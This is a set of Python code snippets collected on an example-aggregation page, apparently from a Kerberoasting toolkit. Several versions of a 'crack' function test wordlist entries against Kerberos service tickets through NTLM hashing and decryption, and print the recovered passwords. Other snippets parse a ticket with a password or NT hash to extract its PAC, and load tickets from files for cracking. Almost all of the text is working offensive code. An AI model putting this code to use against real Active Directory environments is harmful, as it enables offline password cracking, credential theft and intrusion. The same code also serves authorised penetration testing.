def crack(wordlist, enctickets):
    toremove = []
    while enctickets:
        try:
            word = wordlist.get()
            if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE':
                break
            print "\ntrying %s" % word.encode('utf-8').decode(
                'utf-8-sig').strip()
            for et in enctickets:
                kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2,
                                                et[0])
                if kdata:
                    print 'found password for ticket %i: %s  File: %s' % (
                        et[1], word, et[2])
                    toremove.append(et)
                # if len(et):
                # print str(et[0])
            for et in toremove:
                try:
                    enctickets.remove(et)
                except:
                    return
                if not enctickets:
                    return
        except:
            continue
Exemplo n.º 2
0
def crack(wordlist, enctickets):
    toremove = []
    while enctickets:
        word = wordlist.get()
        #print "trying %s" % word
        for et in enctickets:
            kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0])
            if kdata:
                print('found password for ticket %i: %s  File: %s' %
                      (et[1], word, et[2]))
                toremove.append(et)
        for et in toremove:
            try:
                enctickets.remove(et)
            except:
                return
            if not enctickets:
                return
Exemplo n.º 3
0
def crack(wordlist, enctickets):
	toremove = []
	while enctickets:
		word = wordlist.get()
		if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE':
			break
		#print "trying %s" % word
		for et in enctickets:
			kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0])
			if kdata:
				print 'found password for ticket %i: %s  File: %s' % (et[1], word, et[2])
				toremove.append(et)
		for et in toremove:
			try:
				enctickets.remove(et)
			except:
				return
			if not enctickets:
				return
Exemplo n.º 4
0
	parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', required=False, 
					default=False,
					help='verbose')
	parser.add_argument('-d', '--debug', dest='debug', action='store_true', required=False, 
					default=False,
					help='show debug messages')
	#parser.add_argument('-t', '--enctype', dest='enctype', action='store', required=False, default=2, 
	#				metavar='2', type=int, 
	#				help='message type, from RAM it is 2 (This should not need to be changed)')


	args = parser.parse_args()

	# make sure a password or hash is provided
	if args.nthash == None and args.password != None:
		key = kerberos.ntlmhash(args.password)
	elif args.nthash != None:
		key = args.nthash.decode('hex')
	else:
		print("You must provide either the password (-p) or the hash (-n)")
		exit(1)

	# read the ticket from the file
	fullraw = args.infile.read()
	args.infile.close()

	# do the rewrite
	#newticket = rewriteticket(key, fullraw,  debug=args.debug, verbose=args.verbose)

	pac = getpac(key, fullraw)
	pacobj = PAC.PAC(pac)
Exemplo n.º 5
0
	parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', required=False, 
					default=False,
					help='verbose')
	parser.add_argument('-d', '--debug', dest='debug', action='store_true', required=False, 
					default=False,
					help='show debug messages')
	#parser.add_argument('-t', '--enctype', dest='enctype', action='store', required=False, default=2, 
	#				metavar='2', type=int, 
	#				help='message type, from RAM it is 2 (This should not need to be changed)')


	args = parser.parse_args()

	# make sure a password or hash is provided
	if args.nthash == None and args.password != None:
		key = kerberos.ntlmhash(args.password)
	elif args.nthash != None:
		key = args.nthash.decode('hex')
	else:
		print "You must provide either the password (-p) or the hash (-n)"
		exit(1)

	# read the ticket from the file
	fullraw = args.infile.read()
	args.infile.close()

	# do the rewrite
	#newticket = rewriteticket(key, fullraw,  debug=args.debug, verbose=args.verbose)

	pac = getpac(key, fullraw)
	pacobj = PAC.PAC(pac)
Exemplo n.º 6
0
                ((decoder.decode(data)[0][2][0][3][2]).asOctets(), i, f))
            i += 1
        elif data[:2] == '6d':
            for ticket in data.strip().split('\n'):
                enctickets.append(((decoder.decode(
                    ticket.decode('hex'))[0][4][3][2]).asOctets(), i, f))
                i += 1

if len(enctickets):
    print("Cracking %i tickets..." % len(enctickets))
else:
    print("No tickets found")
    sys.exit()

# load wordlist
for w in args.wordlistfile:
    word = w.decode('utf-8').strip()
    hash = kerberos.ntlmhash(word)
    for et in enctickets:
        kdata, nonce = kerberos.decrypt(hash, 2, et[0])
        if kdata:
            print('found password for ticket %i: %s  File: %s' %
                  (et[1], word, et[2]))
            enctickets.remove(et)
            if len(enctickets) == 0:
                print('Successfully cracked all tickets')
                sys.exit()

if len(enctickets):
    print("Unable to crack %i tickets" % len(enctickets))